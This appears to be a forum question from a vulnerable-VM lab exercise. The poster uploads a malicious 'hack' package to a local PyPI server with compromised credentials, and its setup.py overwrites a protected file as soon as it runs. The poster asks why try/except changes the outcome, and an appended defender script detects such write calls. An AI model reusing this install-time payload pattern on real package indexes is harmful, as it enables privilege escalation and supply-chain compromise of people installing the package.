I'm experimenting with setup.py inside a vulnerable VM that's running a pypi server with a listener on localhost:PORT.

My current account does not have write access to the following file: /path/to/a/protected/file

What I do have access to are the credentials of the pypi repository running on localhost:PORT.

So, to take advantage of that, I've created a local "hack" package, with nothing more than the .pypirc to configure the compromised repository's credentials and the setup.py containing the malicious code.

.pypirc

[distutils]
index-servers =
  hack

[hack]
repository: http://127.0.0.1:PORT
username: compromised_username
password: compromised_passwd

setup.py

import setuptools

try:
    with open("/path/to/a/protected/file", "w+") as fh:
        fh.write("something really bad")
except:
    setuptools.setup(
        name="hack",
        version="0.0.1",
        author="Example Author",
        author_email="author@example.com",
        description="A small example package",
    )

To upload the malicious package, I then just have to run:

python setup.py sdist upload -r hack

Now for the interesting bit: this does actually result in opening the file and writing something really bad in it.

BUT

The same code (setup.py) returns a permission denied error when trying to access the file if I remove the try: except clause.

This leaves me in utter confusion about the way setup.py evaluates the try: except.

The way I understand try: except is that if the code under try works, then the except is ignored; otherwise, if the error class is caught by the except, then what's inside the except is run.

But this goes against that understanding...

Segfault
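As an added example (not part of the original post): a defender-side check that a package index or review pipeline could run on a submitted setup.py, using Python's `ast` module to report write-mode `open()` calls that execute as soon as the script is run, which is the pattern in the question. The function names and the sample string are constructed for illustration.

```python
import ast

# Constructed sample: the setup.py pattern from the question (placeholder path).
SAMPLE_SETUP_PY = '''
import setuptools

try:
    with open("/path/to/a/protected/file", "w+") as fh:
        fh.write("something really bad")
except:
    setuptools.setup(name="hack", version="0.0.1")
'''

WRITE_FLAGS = set("wax+")  # any of these in the mode string means the file can be modified

def _open_mode(call):
    """Return the literal mode of an open() call, or None when it is not a string literal."""
    mode = call.args[1] if len(call.args) > 1 else None
    for kw in call.keywords:
        if kw.arg == "mode":
            mode = kw.value
    if mode is None:
        return "r"  # open() defaults to read-only
    if isinstance(mode, ast.Constant) and isinstance(mode.value, str):
        return mode.value
    return None

def import_time_writes(source):
    """List (line, path, mode) for write-capable open() calls that run when the script executes."""
    findings = []

    def visit(node):
        # Function bodies do not run when the script is merely executed; skip them.
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda)):
            return
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id == "open" and node.args):
            mode = _open_mode(node)
            # A non-literal mode (None) is reported too, since a write cannot be ruled out.
            if mode is None or WRITE_FLAGS & set(mode):
                target = node.args[0]
                path = target.value if isinstance(target, ast.Constant) else "<dynamic>"
                findings.append((node.lineno, path, mode))
        for child in ast.iter_child_nodes(node):
            visit(child)

    visit(ast.parse(source))
    return findings

if __name__ == "__main__":
    print(import_time_writes(SAMPLE_SETUP_PY))
```

The walk descends into `try`, `with` and `if` blocks, so wrapping the write in a `try:` does not hide it from the check.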